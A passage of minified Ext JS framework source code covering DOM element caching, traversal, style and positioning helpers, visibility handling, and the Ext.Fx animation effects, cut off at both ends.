var o = a[m.id].data;
if (arguments.length == 2) {
return o[l]
} else {
return(o[l] = n)
}
};
function j() {
if (!Ext.enableGarbageCollector) {
clearInterval(e.collectorThreadId)
} else {
var l, n, q, p;
for (l in a) {
p = a[l];
if (p.skipGC) {
continue
}
n = p.el;
q = n.dom;
if (!q || !q.parentNode || (!q.offsetParent && !h.getElementById(l))) {
if (Ext.enableListenerCollection) {
Ext.EventManager.removeAll(q)
}
delete a[l]
}
}
if (Ext.isIE) {
var m = {};
for (l in a) {
m[l] = a[l]
}
a = Ext.elCache = m
}
}
}
e.collectorThreadId = setInterval(j, 30000);
var b = function () {
};
b.prototype = e.prototype;
e.Flyweight = function (l) {
this.dom = l
};
e.Flyweight.prototype = new b();
e.Flyweight.prototype.isFlyweight = true;
e._flyweights = {};
e.fly = function (n, l) {
var m = null;
l = l || "_global";
if (n = Ext.getDom(n)) {
(e._flyweights[l] = e._flyweights[l] || new e.Flyweight()).dom = n;
m = e._flyweights[l]
}
return m
};
Ext.get = e.get;
Ext.fly = e.fly;
var g = Ext.isStrict ? {select:1} : {input:1, select:1, textarea:1};
if (Ext.isIE || Ext.isGecko) {
g.button = 1
}
})();
Ext.Element.addMethods(function () {
var d = "parentNode", b = "nextSibling", c = "previousSibling", e = Ext.DomQuery, a = Ext.get;
return{findParent:function (m, l, h) {
var j = this.dom, g = document.body, k = 0, i;
if (Ext.isGecko && Object.prototype.toString.call(j) == "[object XULElement]") {
return null
}
l = l || 50;
if (isNaN(l)) {
i = Ext.getDom(l);
l = Number.MAX_VALUE
}
while (j && j.nodeType == 1 && k < l && j != g && j != i) {
if (e.is(j, m)) {
return h ? a(j) : j
}
k++;
j = j.parentNode
}
return null
}, findParentNode:function (j, i, g) {
var h = Ext.fly(this.dom.parentNode, "_internal");
return h ? h.findParent(j, i, g) : null
}, up:function (h, g) {
return this.findParentNode(h, g, true)
}, select:function (g) {
return Ext.Element.select(g, this.dom)
}, query:function (g) {
return e.select(g, this.dom)
}, child:function (g, h) {
var i = e.selectNode(g, this.dom);
return h ? i : a(i)
}, down:function (g, h) {
var i = e.selectNode(" > " + g, this.dom);
return h ? i : a(i)
}, parent:function (g, h) {
return this.matchNode(d, d, g, h)
}, next:function (g, h) {
return this.matchNode(b, b, g, h)
}, prev:function (g, h) {
return this.matchNode(c, c, g, h)
}, first:function (g, h) {
return this.matchNode(b, "firstChild", g, h)
}, last:function (g, h) {
return this.matchNode(c, "lastChild", g, h)
}, matchNode:function (h, k, g, i) {
var j = this.dom[k];
while (j) {
if (j.nodeType == 1 && (!g || e.is(j, g))) {
return !i ? a(j) : j
}
j = j[h]
}
return null
}}
}());
Ext.Element.addMethods(function () {
var c = Ext.getDom, a = Ext.get, b = Ext.DomHelper;
return{appendChild:function (d) {
return a(d).appendTo(this)
}, appendTo:function (d) {
c(d).appendChild(this.dom);
return this
}, insertBefore:function (d) {
(d = c(d)).parentNode.insertBefore(this.dom, d);
return this
}, insertAfter:function (d) {
(d = c(d)).parentNode.insertBefore(this.dom, d.nextSibling);
return this
}, insertFirst:function (e, d) {
e = e || {};
if (e.nodeType || e.dom || typeof e == "string") {
e = c(e);
this.dom.insertBefore(e, this.dom.firstChild);
return !d ? a(e) : e
} else {
return this.createChild(e, this.dom.firstChild, d)
}
}, replace:function (d) {
d = a(d);
this.insertBefore(d);
d.remove();
return this
}, replaceWith:function (d) {
var e = this;
if (d.nodeType || d.dom || typeof d == "string") {
d = c(d);
e.dom.parentNode.insertBefore(d, e.dom)
} else {
d = b.insertBefore(e.dom, d)
}
delete Ext.elCache[e.id];
Ext.removeNode(e.dom);
e.id = Ext.id(e.dom = d);
Ext.Element.addToCache(e.isFlyweight ? new Ext.Element(e.dom) : e);
return e
}, createChild:function (e, d, g) {
e = e || {tag:"div"};
return d ? b.insertBefore(d, e, g !== true) : b[!this.dom.firstChild ? "overwrite" : "append"](this.dom, e, g !== true)
}, wrap:function (d, e) {
var g = b.insertBefore(this.dom, d || {tag:"div"}, !e);
g.dom ? g.dom.appendChild(this.dom) : g.appendChild(this.dom);
return g
}, insertHtml:function (e, g, d) {
var h = b.insertHtml(e, this.dom, g);
return d ? Ext.get(h) : h
}}
}());
Ext.Element.addMethods(function () {
var A = Ext.supports, h = {}, x = /(-[a-z])/gi, s = document.defaultView, D = /alpha\(opacity=(.*)\)/i, l = /^\s+|\s+$/g, B = Ext.Element, u = /\s+/, b = /\w/g, d = "padding", c = "margin", y = "border", t = "-left", q = "-right", w = "-top", o = "-bottom", j = "-width", r = Math, z = "hidden", e = "isClipped", k = "overflow", n = "overflow-x", m = "overflow-y", C = "originalClip", i = {l:y + t + j, r:y + q + j, t:y + w + j, b:y + o + j}, g = {l:d + t, r:d + q, t:d + w, b:d + o}, a = {l:c + t, r:c + q, t:c + w, b:c + o}, E = Ext.Element.data;
function p(F, G) {
return G.charAt(1).toUpperCase()
}
function v(F) {
return h[F] || (h[F] = F == "float" ? (A.cssFloat ? "cssFloat" : "styleFloat") : F.replace(x, p))
}
return{adjustWidth:function (F) {
var G = this;
var H = (typeof F == "number");
if (H && G.autoBoxAdjust && !G.isBorderBox()) {
F -= (G.getBorderWidth("lr") + G.getPadding("lr"))
}
return(H && F < 0) ? 0 : F
}, adjustHeight:function (F) {
var G = this;
var H = (typeof F == "number");
if (H && G.autoBoxAdjust && !G.isBorderBox()) {
F -= (G.getBorderWidth("tb") + G.getPadding("tb"))
}
return(H && F < 0) ? 0 : F
}, addClass:function (J) {
var K = this, I, F, H, G = [];
if (!Ext.isArray(J)) {
if (typeof J == "string" && !this.hasClass(J)) {
K.dom.className += " " + J
}
} else {
for (I = 0, F = J.length; I < F; I++) {
H = J[I];
if (typeof H == "string" && (" " + K.dom.className + " ").indexOf(" " + H + " ") == -1) {
G.push(H)
}
}
if (G.length) {
K.dom.className += " " + G.join(" ")
}
}
return K
}, removeClass:function (K) {
var L = this, J, G, F, I, H;
if (!Ext.isArray(K)) {
K = [K]
}
if (L.dom && L.dom.className) {
H = L.dom.className.replace(l, "").split(u);
for (J = 0, F = K.length; J < F; J++) {
I = K[J];
if (typeof I == "string") {
I = I.replace(l, "");
G = H.indexOf(I);
if (G != -1) {
H.splice(G, 1)
}
}
}
L.dom.className = H.join(" ")
}
return L
}, radioClass:function (I) {
var J = this.dom.parentNode.childNodes, G, H, F;
I = Ext.isArray(I) ? I : [I];
for (H = 0, F = J.length; H < F; H++) {
G = J[H];
if (G && G.nodeType == 1) {
Ext.fly(G, "_internal").removeClass(I)
}
}
return this.addClass(I)
}, toggleClass:function (F) {
return this.hasClass(F) ? this.removeClass(F) : this.addClass(F)
}, hasClass:function (F) {
return F && (" " + this.dom.className + " ").indexOf(" " + F + " ") != -1
}, replaceClass:function (G, F) {
return this.removeClass(G).addClass(F)
}, isStyle:function (F, G) {
return this.getStyle(F) == G
}, getStyle:function () {
return s && s.getComputedStyle ? function (K) {
var I = this.dom, F, H, G, J;
if (I == document) {
return null
}
K = v(K);
G = (F = I.style[K]) ? F : (H = s.getComputedStyle(I, "")) ? H[K] : null;
if (K == "marginRight" && G != "0px" && !A.correctRightMargin) {
J = I.style.display;
I.style.display = "inline-block";
G = s.getComputedStyle(I, "").marginRight;
I.style.display = J
}
if (K == "backgroundColor" && G == "rgba(0, 0, 0, 0)" && !A.correctTransparentColor) {
G = "transparent"
}
return G
} : function (J) {
var H = this.dom, F, G;
if (H == document) {
return null
}
if (J == "opacity") {
if (H.style.filter.match) {
if (F = H.style.filter.match(D)) {
var I = parseFloat(F[1]);
if (!isNaN(I)) {
return I ? I / 100 : 0
}
}
}
return 1
}
J = v(J);
return H.style[J] || ((G = H.currentStyle) ? G[J] : null)
}
}(), getColor:function (F, G, K) {
var I = this.getStyle(F), H = (typeof K != "undefined") ? K : "#", J;
if (!I || (/transparent|inherit/.test(I))) {
return G
}
if (/^r/.test(I)) {
Ext.each(I.slice(4, I.length - 1).split(","), function (L) {
J = parseInt(L, 10);
H += (J < 16 ? "0" : "") + J.toString(16)
})
} else {
I = I.replace("#", "");
H += I.length == 3 ? I.replace(/^(\w)(\w)(\w)$/, "$1$1$2$2$3$3") : I
}
return(H.length > 5 ? H.toLowerCase() : G)
}, setStyle:function (I, H) {
var F, G;
if (typeof I != "object") {
F = {};
F[I] = H;
I = F
}
for (G in I) {
H = I[G];
G == "opacity" ? this.setOpacity(H) : this.dom.style[v(G)] = H
}
return this
}, setOpacity:function (G, F) {
var J = this, H = J.dom.style;
if (!F || !J.anim) {
if (Ext.isIE) {
var I = G < 1 ? "alpha(opacity=" + G * 100 + ")" : "", K = H.filter.replace(D, "").replace(l, "");
H.zoom = 1;
H.filter = K + (K.length > 0 ? " " : "") + I
} else {
H.opacity = G
}
} else {
J.anim({opacity:{to:G}}, J.preanim(arguments, 1), null, 0.35, "easeIn")
}
return J
}, clearOpacity:function () {
var F = this.dom.style;
if (Ext.isIE) {
if (!Ext.isEmpty(F.filter)) {
F.filter = F.filter.replace(D, "").replace(l, "")
}
} else {
F.opacity = F["-moz-opacity"] = F["-khtml-opacity"] = ""
}
return this
}, getHeight:function (H) {
var G = this, J = G.dom, I = Ext.isIE && G.isStyle("display", "none"), F = r.max(J.offsetHeight, I ? 0 : J.clientHeight) || 0;
F = !H ? F : F - G.getBorderWidth("tb") - G.getPadding("tb");
return F < 0 ? 0 : F
}, getWidth:function (G) {
var H = this, J = H.dom, I = Ext.isIE && H.isStyle("display", "none"), F = r.max(J.offsetWidth, I ? 0 : J.clientWidth) || 0;
F = !G ? F : F - H.getBorderWidth("lr") - H.getPadding("lr");
return F < 0 ? 0 : F
}, setWidth:function (G, F) {
var H = this;
G = H.adjustWidth(G);
!F || !H.anim ? H.dom.style.width = H.addUnits(G) : H.anim({width:{to:G}}, H.preanim(arguments, 1));
return H
}, setHeight:function (F, G) {
var H = this;
F = H.adjustHeight(F);
!G || !H.anim ? H.dom.style.height = H.addUnits(F) : H.anim({height:{to:F}}, H.preanim(arguments, 1));
return H
}, getBorderWidth:function (F) {
return this.addStyles(F, i)
}, getPadding:function (F) {
return this.addStyles(F, g)
}, clip:function () {
var F = this, G = F.dom;
if (!E(G, e)) {
E(G, e, true);
E(G, C, {o:F.getStyle(k), x:F.getStyle(n), y:F.getStyle(m)});
F.setStyle(k, z);
F.setStyle(n, z);
F.setStyle(m, z)
}
return F
}, unclip:function () {
var F = this, H = F.dom;
if (E(H, e)) {
E(H, e, false);
var G = E(H, C);
if (G.o) {
F.setStyle(k, G.o)
}
if (G.x) {
F.setStyle(n, G.x)
}
if (G.y) {
F.setStyle(m, G.y)
}
}
return F
}, addStyles:function (M, L) {
var J = 0, K = M.match(b), I, H, G, F = K.length;
for (G = 0; G < F; G++) {
I = K[G];
H = I && parseInt(this.getStyle(L[I]), 10);
if (H) {
J += r.abs(H)
}
}
return J
}, margins:a}
}());
(function () {
var a = Ext.lib.Dom, b = "left", g = "right", d = "top", i = "bottom", h = "position", c = "static", e = "relative", j = "auto", k = "z-index";
Ext.Element.addMethods({getX:function () {
return a.getX(this.dom)
}, getY:function () {
return a.getY(this.dom)
}, getXY:function () {
return a.getXY(this.dom)
}, getOffsetsTo:function (l) {
var n = this.getXY(), m = Ext.fly(l, "_internal").getXY();
return[n[0] - m[0], n[1] - m[1]]
}, setX:function (l, m) {
return this.setXY([l, this.getY()], this.animTest(arguments, m, 1))
}, setY:function (m, l) {
return this.setXY([this.getX(), m], this.animTest(arguments, l, 1))
}, setLeft:function (l) {
this.setStyle(b, this.addUnits(l));
return this
}, setTop:function (l) {
this.setStyle(d, this.addUnits(l));
return this
}, setRight:function (l) {
this.setStyle(g, this.addUnits(l));
return this
}, setBottom:function (l) {
this.setStyle(i, this.addUnits(l));
return this
}, setXY:function (n, l) {
var m = this;
if (!l || !m.anim) {
a.setXY(m.dom, n)
} else {
m.anim({points:{to:n}}, m.preanim(arguments, 1), "motion")
}
return m
}, setLocation:function (l, n, m) {
return this.setXY([l, n], this.animTest(arguments, m, 2))
}, moveTo:function (l, n, m) {
return this.setXY([l, n], this.animTest(arguments, m, 2))
}, getLeft:function (l) {
return !l ? this.getX() : parseInt(this.getStyle(b), 10) || 0
}, getRight:function (l) {
var m = this;
return !l ? m.getX() + m.getWidth() : (m.getLeft(true) + m.getWidth()) || 0
}, getTop:function (l) {
return !l ? this.getY() : parseInt(this.getStyle(d), 10) || 0
}, getBottom:function (l) {
var m = this;
return !l ? m.getY() + m.getHeight() : (m.getTop(true) + m.getHeight()) || 0
}, position:function (p, o, l, n) {
var m = this;
if (!p && m.isStyle(h, c)) {
m.setStyle(h, e)
} else {
if (p) {
m.setStyle(h, p)
}
}
if (o) {
m.setStyle(k, o)
}
if (l || n) {
m.setXY([l || false, n || false])
}
}, clearPositioning:function (l) {
l = l || "";
this.setStyle({left:l, right:l, top:l, bottom:l, "z-index":"", position:c});
return this
}, getPositioning:function () {
var m = this.getStyle(b);
var n = this.getStyle(d);
return{position:this.getStyle(h), left:m, right:m ? "" : this.getStyle(g), top:n, bottom:n ? "" : this.getStyle(i), "z-index":this.getStyle(k)}
}, setPositioning:function (l) {
var n = this, m = n.dom.style;
n.setStyle(l);
if (l.right == j) {
m.right = ""
}
if (l.bottom == j) {
m.bottom = ""
}
return n
}, translatePoints:function (m, u) {
u = isNaN(m[1]) ? u : m[1];
m = isNaN(m[0]) ? m : m[0];
var q = this, r = q.isStyle(h, e), s = q.getXY(), n = parseInt(q.getStyle(b), 10), p = parseInt(q.getStyle(d), 10);
n = !isNaN(n) ? n : (r ? 0 : q.dom.offsetLeft);
p = !isNaN(p) ? p : (r ? 0 : q.dom.offsetTop);
return{left:(m - s[0] + n), top:(u - s[1] + p)}
}, animTest:function (m, l, n) {
return !!l && this.preanim ? this.preanim(m, n) : false
}})
})();
Ext.Element.addMethods({isScrollable:function () {
var a = this.dom;
return a.scrollHeight > a.clientHeight || a.scrollWidth > a.clientWidth
}, scrollTo:function (a, b) {
this.dom["scroll" + (/top/i.test(a) ? "Top" : "Left")] = b;
return this
}, getScroll:function () {
var i = this.dom, h = document, a = h.body, c = h.documentElement, b, g, e;
if (i == h || i == a) {
if (Ext.isIE && Ext.isStrict) {
b = c.scrollLeft;
g = c.scrollTop
} else {
b = window.pageXOffset;
g = window.pageYOffset
}
e = {left:b || (a ? a.scrollLeft : 0), top:g || (a ? a.scrollTop : 0)}
} else {
e = {left:i.scrollLeft, top:i.scrollTop}
}
return e
}});
Ext.Element.VISIBILITY = 1;
Ext.Element.DISPLAY = 2;
Ext.Element.OFFSETS = 3;
Ext.Element.ASCLASS = 4;
Ext.Element.visibilityCls = "x-hide-nosize";
Ext.Element.addMethods(function () {
var e = Ext.Element, p = "opacity", j = "visibility", g = "display", d = "hidden", n = "offsets", k = "asclass", m = "none", a = "nosize", b = "originalDisplay", c = "visibilityMode", h = "isVisible", i = e.data, l = function (r) {
var q = i(r, b);
if (q === undefined) {
i(r, b, q = "")
}
return q
}, o = function (r) {
var q = i(r, c);
if (q === undefined) {
i(r, c, q = 1)
}
return q
};
return{originalDisplay:"", visibilityMode:1, setVisibilityMode:function (q) {
i(this.dom, c, q);
return this
}, animate:function (r, t, s, u, q) {
this.anim(r, {duration:t, callback:s, easing:u}, q);
return this
}, anim:function (t, u, r, w, s, q) {
r = r || "run";
u = u || {};
var v = this, x = Ext.lib.Anim[r](v.dom, t, (u.duration || w) || 0.35, (u.easing || s) || "easeOut", function () {
if (q) {
q.call(v)
}
if (u.callback) {
u.callback.call(u.scope || v, v, u)
}
}, v);
u.anim = x;
return x
}, preanim:function (q, r) {
return !q[r] ? false : (typeof q[r] == "object" ? q[r] : {duration:q[r + 1], callback:q[r + 2], easing:q[r + 3]})
}, isVisible:function () {
var q = this, s = q.dom, r = i(s, h);
if (typeof r == "boolean") {
return r
}
r = !q.isStyle(j, d) && !q.isStyle(g, m) && !((o(s) == e.ASCLASS) && q.hasClass(q.visibilityCls || e.visibilityCls));
i(s, h, r);
return r
}, setVisible:function (t, q) {
var w = this, r, y, x, v, u = w.dom, s = o(u);
if (typeof q == "string") {
switch (q) {
case g:
s = e.DISPLAY;
break;
case j:
s = e.VISIBILITY;
break;
case n:
s = e.OFFSETS;
break;
case a:
case k:
s = e.ASCLASS;
break
}
w.setVisibilityMode(s);
q = false
}
if (!q || !w.anim) {
if (s == e.ASCLASS) {
w[t ? "removeClass" : "addClass"](w.visibilityCls || e.visibilityCls)
} else {
if (s == e.DISPLAY) {
return w.setDisplayed(t)
} else {
if (s == e.OFFSETS) {
if (!t) {
w.hideModeStyles = {position:w.getStyle("position"), top:w.getStyle("top"), left:w.getStyle("left")};
w.applyStyles({position:"absolute", top:"-10000px", left:"-10000px"})
} else {
w.applyStyles(w.hideModeStyles || {position:"", top:"", left:""});
delete w.hideModeStyles
}
} else {
w.fixDisplay();
u.style.visibility = t ? "visible" : d
}
}
}
} else {
if (t) {
w.setOpacity(0.01);
w.setVisible(true)
}
w.anim({opacity:{to:(t ? 1 : 0)}}, w.preanim(arguments, 1), null, 0.35, "easeIn", function () {
t || w.setVisible(false).setOpacity(1)
})
}
i(u, h, t);
return w
}, hasMetrics:function () {
var q = this.dom;
return this.isVisible() || (o(q) == e.VISIBILITY)
}, toggle:function (q) {
var r = this;
r.setVisible(!r.isVisible(), r.preanim(arguments, 0));
return r
}, setDisplayed:function (q) {
if (typeof q == "boolean") {
q = q ? l(this.dom) : m
}
this.setStyle(g, q);
return this
}, fixDisplay:function () {
var q = this;
if (q.isStyle(g, m)) {
q.setStyle(j, d);
q.setStyle(g, l(this.dom));
if (q.isStyle(g, m)) {
q.setStyle(g, "block")
}
}
}, hide:function (q) {
if (typeof q == "string") {
this.setVisible(false, q);
return this
}
this.setVisible(false, this.preanim(arguments, 0));
return this
}, show:function (q) {
if (typeof q == "string") {
this.setVisible(true, q);
return this
}
this.setVisible(true, this.preanim(arguments, 0));
return this
}}
}());
(function () {
var y = null, A = undefined, k = true, t = false, j = "setX", h = "setY", a = "setXY", n = "left", l = "bottom", s = "top", m = "right", q = "height", g = "width", i = "points", w = "hidden", z = "absolute", u = "visible", e = "motion", o = "position", r = "easeOut", d = new Ext.Element.Flyweight(), v = {}, x = function (B) {
return B || {}
}, p = function (B) {
d.dom = B;
d.id = Ext.id(B);
return d
}, c = function (B) {
if (!v[B]) {
v[B] = []
}
return v[B]
}, b = function (C, B) {
v[C] = B
};
Ext.enableFx = k;
Ext.Fx = {switchStatements:function (C, D, B) {
return D.apply(this, B[C])
}, slideIn:function (H, E) {
E = x(E);
var J = this, G = J.dom, M = G.style, O, B, L, D, C, M, I, N, K, F;
H = H || "t";
J.queueFx(E, function () {
O = p(G).getXY();
p(G).fixDisplay();
B = p(G).getFxRestore();
L = {x:O[0], y:O[1], 0:O[0], 1:O[1], width:G.offsetWidth, height:G.offsetHeight};
L.right = L.x + L.width;
L.bottom = L.y + L.height;
p(G).setWidth(L.width).setHeight(L.height);
D = p(G).fxWrap(B.pos, E, w);
M.visibility = u;
M.position = z;
function P() {
p(G).fxUnwrap(D, B.pos, E);
M.width = B.width;
M.height = B.height;
p(G).afterFx(E)
}
N = {to:[L.x, L.y]};
K = {to:L.width};
F = {to:L.height};
function Q(U, R, V, S, X, Z, ac, ab, aa, W, T) {
var Y = {};
p(U).setWidth(V).setHeight(S);
if (p(U)[X]) {
p(U)[X](Z)
}
R[ac] = R[ab] = "0";
if (aa) {
Y.width = aa
}
if (W) {
Y.height = W
}
if (T) {
Y.points = T
}
return Y
}
I = p(G).switchStatements(H.toLowerCase(), Q, {t:[D, M, L.width, 0, y, y, n, l, y, F, y], l:[D, M, 0, L.height, y, y, m, s, K, y, y], r:[D, M, L.width, L.height, j, L.right, n, s, y, y, N], b:[D, M, L.width, L.height, h, L.bottom, n, s, y, F, N], tl:[D, M, 0, 0, y, y, m, l, K, F, N], bl:[D, M, 0, 0, h, L.y + L.height, m, s, K, F, N], br:[D, M, 0, 0, a, [L.right, L.bottom], n, s, K, F, N], tr:[D, M, 0, 0, j, L.x + L.width, n, l, K, F, N]});
M.visibility = u;
p(D).show();
arguments.callee.anim = p(D).fxanim(I, E, e, 0.5, r, P)
});
return J
}, slideOut:function (F, D) {
D = x(D);
var H = this, E = H.dom, K = E.style, L = H.getXY(), C, B, I, J, G = {to:0};
F = F || "t";
H.queueFx(D, function () {
B = p(E).getFxRestore();
I = {x:L[0], y:L[1], 0:L[0], 1:L[1], width:E.offsetWidth, height:E.offsetHeight};
I.right = I.x + I.width;
I.bottom = I.y + I.height;
p(E).setWidth(I.width).setHeight(I.height);
C = p(E).fxWrap(B.pos, D, u);
K.visibility = u;
K.position = z;
p(C).setWidth(I.width).setHeight(I.height);
function M() {
D.useDisplay ? p(E).setDisplayed(t) : p(E).hide();
p(E).fxUnwrap(C, B.pos, D);
K.width = B.width;
K.height = B.height;
p(E).afterFx(D)
}
function N(O, W, U, X, S, V, R, T, Q) {
var P = {};
O[W] = O[U] = "0";
P[X] = S;
if (V) {
P[V] = R
}
if (T) {
P[T] = Q
}
return P
}
J = p(E).switchStatements(F.toLowerCase(), N, {t:[K, n, l, q, G], l:[K, m, s, g, G], r:[K, n, s, g, G, i, {to:[I.right, I.y]}], b:[K, n, s, q, G, i, {to:[I.x, I.bottom]}], tl:[K, m, l, g, G, q, G], bl:[K, m, s, g, G, q, G, i, {to:[I.x, I.bottom]}], br:[K, n, s, g, G, q, G, i, {to:[I.x + I.width, I.bottom]}], tr:[K, n, l, g, G, q, G, i, {to:[I.right, I.y]}]});
arguments.callee.anim = p(C).fxanim(J, D, e, 0.5, r, M)
});
return H
}, puff:function (H) {
H = x(H);
var F = this, G = F.dom, C = G.style, D, B, E;
F.queueFx(H, function () {
D = p(G).getWidth();
B = p(G).getHeight();
p(G).clearOpacity();
p(G).show();
E = p(G).getFxRestore();
function I() {
H.useDisplay ? p(G).setDisplayed(t) : p(G).hide();
p(G).clearOpacity();
p(G).setPositioning(E.pos);
C.width = E.width;
C.height = E.height;
C.fontSize = "";
p(G).afterFx(H)
}
arguments.callee.anim = p(G).fxanim({width:{to:p(G).adjustWidth(D * 2)}, height:{to:p(G).adjustHeight(B * 2)}, points:{by:[-D * 0.5, -B * 0.5]}, opacity:{to:0}, fontSize:{to:200, unit:"%"}}, H, e, 0.5, r, I)
});
return F
}, switchOff:function (F) {
F = x(F);
var D = this, E = D.dom, B = E.style, C;
D.queueFx(F, function () {
p(E).clearOpacity();
p(E).clip();
C = p(E).getFxRestore();
function G() {
F.useDisplay ? p(E).setDisplayed(t) : p(E).hide();
p(E).clearOpacity();
p(E).setPositioning(C.pos);
B.width = C.width;
B.height = C.height;
p(E).afterFx(F)
}
p(E).fxanim({opacity:{to:0.3}}, y, y, 0.1, y, function () {
p(E).clearOpacity();
(function () {
p(E).fxanim({height:{to:1}, points:{by:[0, p(E).getHeight() * 0.5]}}, F, e, 0.3, "easeIn", G)
}).defer(100)
})
});
return D
}, highlight:function (D, H) {
H = x(H);
var F = this, G = F.dom, B = H.attr || "backgroundColor", C = {}, E;
F.queueFx(H, function () {
p(G).clearOpacity();
p(G).show();
function I() {
G.style[B] = E;
p(G).afterFx(H)
}
E = G.style[B];
C[B] = {from:D || "ffff9c", to:H.endColor || p(G).getColor(B) || "ffffff"};
arguments.callee.anim = p(G).fxanim(C, H, "color", 1, "easeIn", I)
});
return F
}, frame:function (B, E, H) {
H = x(H);
var D = this, G = D.dom, C, F;
D.queueFx(H, function () {
B = B || "#C3DAF9";
if (B.length == 6) {
B = "#" + B
}
E = E || 1;
p(G).show();
var L = p(G).getXY(), J = {x:L[0], y:L[1], 0:L[0], 1:L[1], width:G.offsetWidth, height:G.offsetHeight}, I = function () {
C = p(document.body || document.documentElement).createChild({style:{position:z, "z-index":35000, border:"0px solid " + B}});
return C.queueFx({}, K)
};
arguments.callee.anim = {isAnimated:true, stop:function () {
E = 0;
C.stopFx()
}};
function K() {
var M = Ext.isBorderBox ? 2 : 1;
F = C.anim({top:{from:J.y, to:J.y - 20}, left:{from:J.x, to:J.x - 20}, borderWidth:{from:0, to:10}, opacity:{from:1, to:0}, height:{from:J.height, to:J.height + 20 * M}, width:{from:J.width, to:J.width + 20 * M}}, {duration:H.duration || 1, callback:function () {
C.remove();
--E > 0 ? I() : p(G).afterFx(H)
}});
arguments.callee.anim = {isAnimated:true, stop:function () {
F.stop()
}}
}
I()
});
return D
}, pause:function (D) {
var C = this.dom, B;
this.queueFx({}, function () {
B = setTimeout(function () {
p(C).afterFx({})
}, D * 1000);
arguments.callee.anim = {isAnimated:true, stop:function () {
clearTimeout(B);
p(C).afterFx({})
}}
});
return this
}, fadeIn:function (D) {
D = x(D);
var B = this, C = B.dom, E = D.endOpacity || 1;
B.queueFx(D, function () {
p(C).setOpacity(0);
p(C).fixDisplay();
C.style.visibility = u;
arguments.callee.anim = p(C).fxanim({opacity:{to:E}}, D, y, 0.5, r, function () {
if (E == 1) {
p(C).clearOpacity()
}
p(C).afterFx(D)
})
});
return B
}, fadeOut:function (E) {
E = x(E);
var C = this, D = C.dom, B = D.style, F = E.endOpacity || 0;
C.queueFx(E, function () {
arguments.callee.anim = p(D).fxanim({opacity:{to:F}}, E, y, 0.5, r, function () {
if (F == 0) {
Ext.Element.data(D, "visibilityMode") == Ext.Element.DISPLAY || E.useDisplay ? B.display = "none" : B.visibility = w;
p(D).clearOpacity()
}
p(D).afterFx(E)
})
});
return C
}, scale:function (B, C, D) {
this.shift(Ext.apply({}, D, {width:B, height:C}));
return this
}, shift:function (D) {
D = x(D);
var C = this.dom, B = {};
this.queueFx(D, function () {
for (var E in D) {
if (D[E] != A) {
B[E] = {to:D[E]}
}
}
B.width ? B.width.to = p(C).adjustWidth(D.width) : B;
B.height ? B.height.to = p(C).adjustWidth(D.height) : B;
if (B.x || B.y || B.xy) {
B.points = B.xy || {to:[B.x ? B.x.to : p(C).getX(), B.y ? B.y.to : p(C).getY()]}
}
arguments.callee.anim = p(C).fxanim(B, D, e, 0.35, r, function () {
p(C).afterFx(D)
})
});
return this
}, ghost:function (E, C) {
C = x(C);
var G = this, D = G.dom, J = D.style, H = {opacity:{to:0}, points:{}}, K = H.points, B, I, F;
E = E || "b";
G.queueFx(C, function () {
B = p(D).getFxRestore();
I = p(D).getWidth();
F = p(D).getHeight();
function L() {
C.useDisplay ? p(D).setDisplayed(t) : p(D).hide();
p(D).clearOpacity();
p(D).setPositioning(B.pos);
J.width = B.width;
J.height = B.height;
p(D).afterFx(C)
}
K.by = p(D).switchStatements(E.toLowerCase(), function (N, M) {
return[N, M]
}, {t:[0, -F], l:[-I, 0], r:[I, 0], b:[0, F], tl:[-I, -F], bl:[-I, F], br:[I, F], tr:[I, -F]});
arguments.callee.anim = p(D).fxanim(H, C, e, 0.5, r, L)
});
return G
}, syncFx:function () {
var B = this;
B.fxDefaults = Ext.apply(B.fxDefaults || {}, {block:t, concurrent:k, stopFx:t});
return B
}, sequenceFx:function () {
var B = this;
B.fxDefaults = Ext.apply(B.fxDefaults || {}, {block:t, concurrent:t, stopFx:t});
return B
}, nextFx:function () {
var B = c(this.dom.id)[0];
if (B) {
B.call(this)
}
}, hasActiveFx:function () {
return c(this.dom.id)[0]
}, stopFx:function (B) {
var C = this, E = C.dom.id;
if (C.hasActiveFx()) {
var D = c(E)[0];
if (D && D.anim) {
if (D.anim.isAnimated) {
b(E, [D]);
D.anim.stop(B !== undefined ? B : k)
} else {
b(E, [])
}
}
}
return C
}, beforeFx:function (B) {
if (this.hasActiveFx() && !B.concurrent) {
if (B.stopFx) {
this.stopFx();
return k
}
return t
}
return k
}, hasFxBlock:function () {
var B = c(this.dom.id);
return B && B[0] && B[0].block
}, queueFx:function (E, B) {
var C = p(this.dom);
if (!C.hasFxBlock()) {
Ext.applyIf(E, C.fxDefaults);
if (!E.concurrent) {
var D = C.beforeFx(E);
B.block = E.block;
c(C.dom.id).push(B);
if (D) {
C.nextFx()
}
} else {
B.call(C)
}
}
return C
}, fxWrap:function (H, F, D) {
var E = this.dom, C, B;
if (!F.wrap || !(C = Ext.getDom(F.wrap))) {
if (F.fixPosition) {
B = p(E).getXY()
}
var G = document.createElement("div");
G.style.visibility = D;
C = E.parentNode.insertBefore(G, E);
p(C).setPositioning(H);
if (p(C).isStyle(o, "static")) {
p(C).position("relative")
}
p(E).clearPositioning("auto");
p(C).clip();
C.appendChild(E);
if (B) {
p(C).setXY(B)
}
}
return C
}, fxUnwrap:function (C, F, E) {
var D = this.dom;
p(D).clearPositioning();
p(D).setPositioning(F);
if (!E.wrap) {
var B = p(C).dom.parentNode;
B.insertBefore(D, C);
p(C).remove()
}
}, getFxRestore:function () {
var B = this.dom.style;
return{pos:this.getPositioning(), width:B.width, height:B.height}
}, afterFx:function (C) {
var B = this.dom, D = B.id;
if (C.afterStyle) {
p(B).setStyle(C.afterStyle)
}
if (C.afterCls) {
p(B).addClass(C.afterCls)
}
if (C.remove == k) {
p(B).remove()
}
if (C.callback) {
C.callback.call(C.scope, p(B))
}
if (!C.concurrent) {
c(D).shift();
p(B).nextFx()
}
}, fxanim:function (E, F, C, G, D, B) {
C = C || "run";
F = F || {};
var H = Ext.lib.Anim[C](this.dom, E, (F.duration || G) || 0.35, (F.easing || D) || r, B, this);
F.anim = H;
return H
}};
Ext.Fx.resize = Ext.Fx.scale;
Ext.Element.addMethods(Ext.Fx)
})();
Ext.CompositeElementLite = function (b, a) {
this.elements = [];
this.add(b, a);
this.el = new Ext.Element.Flyweight()
};
Ext.CompositeElementLite.prototype = {isComposite:true, getElement:function (a) {
var b = this.el;
b.dom = a;
b.id = a.id;
return b
}, transformElement:function (a) {
return Ext.getDom(a)
}, getCount:function () {
return this.elements.length
}, add:function (d, b) {
var e = this, g = e.elements;
if (!d) {
return this
}
